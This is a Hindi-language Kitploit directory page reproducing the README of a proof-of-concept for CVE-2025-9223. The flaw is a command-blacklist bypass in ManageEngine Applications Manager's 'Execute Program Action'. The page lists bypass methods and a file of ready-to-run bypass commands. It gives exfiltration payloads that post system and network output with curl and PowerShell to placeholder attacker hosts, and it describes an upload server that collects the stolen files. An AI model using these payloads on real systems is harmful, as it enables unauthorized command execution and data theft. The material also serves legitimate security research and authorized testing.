Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2025-9223 — POC CVE-2025-9223 | Kitploit
उपकरण/GitHubGitHub/networkkiller/cve-2025-9223
Vulnerability AnalysisExploitationWeb Application ExploitationData ExfiltrationPenetration TestingCommand and ControlLearning & Education
GitHubnetworkkiller/cve-2025-9223

CVE-2025-9223

POC CVE-2025-9223

रिपॉजिटरी देखें
29 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

Applications Manager - Execute Program Action Bypass PoC

Security Research Python 3.x Proof of Concept

📖 विवरण

इस रिपॉजिटरी में ManageEngine Applications Manager के "Execute Program Action" फंक्शन में कमांड निष्पादन भेद्यता को प्रदर्शित करने वाली एक प्रूफ ऑफ कॉन्सेप्ट (PoC) शामिल है।

🔍 भेद्यता विवरण

Applications Manager खतरनाक कमांड को ब्लॉक करने के लिए एक ब्लैकलिस्ट (BlackListCommands) का उपयोग करता है, लेकिन मान्यता में गंभीर कमियाँ हैं:

  • स्ट्रिंग-आधारित मान्यता केवल पहले टोकन पर
  • पथ सामान्यीकरण या एनवायरनमेंट वेरिएबल विस्तार का अभाव
  • स्क्रिप्ट के माध्यम से अप्रत्यक्ष निष्पादन के खिलाफ कोई सुरक्षा नहीं

🚨 बाइपास के तरीके

तरीकाउदाहरण
पूर्ण पथC:\Windows\System32\netstat.exe
एनवायरनमेंट वेरिएबल%SystemRoot%\System32\netstat.exe
स्क्रिप्ट रैपरecho netstat > a.bat && a.bat

💥 प्रभाव

  • ✅ Applications Manager होस्ट पर प्रमाणित रिमोट कोड निष्पादन (RCE)
  • ✅ सुरक्षा प्रतिबंधों को दरकिनार करते हुए पूर्ण सिस्टम कमांड निष्पादन
  • ✅ सिस्टम उपयोगिताओं (curl, powershell, certutil) का उपयोग करके डेटा बहिर्वाह

📤 एक्सफिल्ट्रेशन पेलोड का उदाहरण

root@kitploit:~
C:\Windows\System32\netstat.exe > out.txt && C:\Windows\System32\curl.exe -X POST -F "[email protected]" http://[KALI_IP]:8000/upload

🛠️ कॉन्फ़िगरेशन और उपयोग

पूर्वापेक्षाएँ

  • Python 3.x
  • लक्ष्य Applications Manager इंस्टेंस तक नेटवर्क पहुंच
  • "Execute Program Action" अनुमतियों के साथ प्रमाणित पहुंच

फ़ाइल अपलोड सर्वर

स्क्रिप्ट upload_server.py एक्सफिल्ट्रेटेड फ़ाइलों को प्राप्त करने के लिए एक सरल HTTP सर्वर प्रदान करती है।

मूल उपयोग

root@kitploit:~
python3 upload_server.py

उन्नत विकल्प

root@kitploit:~
python3 upload_server.py --host 0.0.0.0 --port 8000 --dir ./uploads

पैरामीटर

  • --host: बाइंड पता (डिफ़ॉल्ट: 0.0.0.0)
  • --port: HTTP पोर्ट (डिफ़ॉल्ट: 8000)
  • --dir: आउटपुट निर्देशिका (डिफ़ॉल्ट: वर्तमान निर्देशिका)

API एंडपॉइंट

सुरक्षा सुविधाएँ

✅ पथ ट्रैवर्सल से सुरक्षा
✅ टाइमस्टैम्प के साथ अद्वितीय फ़ाइल नाम
✅ IP और User-Agent के साथ अनुरोध लॉगिंग
✅ कंटेंट प्रकार सत्यापन

🎯 परीक्षण आदेश

बाइपास उदाहरणों के साथ एक test_commands.txt फ़ाइल बनाएँ:

root@kitploit:~
# पूर्ण पथ के साथ बाइपास
C:\Windows\System32\whoami.exe
C:\Windows\System32\netstat.exe -an

# एनवायरनमेंट वेरिएबल के साथ बाइपास
%SystemRoot%\System32\ipconfig.exe
%SystemRoot%\System32\systeminfo.exe

# स्क्रिप्ट रैपर के साथ बाइपास
echo ipconfig > test.bat && test.bat
echo whoami > test.bat && call test.bat

# डेटा बहिर्वाह के उदाहरण
C:\Windows\System32\ipconfig.exe > network.txt && C:\Windows\System32\curl.exe -X POST -F "[email protected]" http://ATTACKER_IP:8000/upload
C:\Windows\System32\systeminfo.exe > system.txt && C:\Windows\System32\powershell.exe -c "Invoke-WebRequest -Uri http://ATTACKER_IP:8000/upload -Method POST -InFile system.txt"

⚠️ कानूनी चेतावनी

महत्वपूर्ण: यह टूल केवल शैक्षिक और अधिकृत परीक्षण उद्देश्यों के लिए प्रदान किया गया है।

❌ उन सिस्टम पर उपयोग न करें जो आपके स्वामित्व में नहीं हैं या जिनके परीक्षण के लिए आपके पास स्पष्ट अनुमति नहीं है
❌ किसी भी अवैध गतिविधि के लिए उपयोग न करें
✅ केवल नियंत्रित वातावरण में सुरक्षा अनुसंधान के लिए उपयोग करें
✅ परीक्षण करने से पहले उचित प्राधिकरण प्राप्त करें

लेखक इस टूल के किसी भी दुरुपयोग के लिए जिम्मेदार नहीं है। उपयोगकर्ता सभी जिम्मेदारी और जोखिम वहन करते हैं।

📄 लाइसेंस

यह प्रोजेक्ट केवल अनुसंधान और शैक्षिक उद्देश्यों के लिए है। सर्वाधिकार सुरक्षित।

👨‍💻 लेखक

Johan Aybar - शैक्षिक उद्देश्यों के लिए


⚠️ याद दिलाना: इस PoC का उपयोग केवल अधिकृत परीक्षण वातावरण में किया जाना चाहिए। अनधिकृत उपयोग अवैध हो सकता है और सख्ती से प्रतिबंधित है।

टूल डाउनलोड करें
तरीकाएंडपॉइंटविवरण
GET/हाल ही में अपलोड की गई फ़ाइलों की सूची
POST/uploadफ़ाइलें अपलोड करें (multipart/form-data)
PUT/upload/[filename]फ़ाइलों की सीधी अपलोड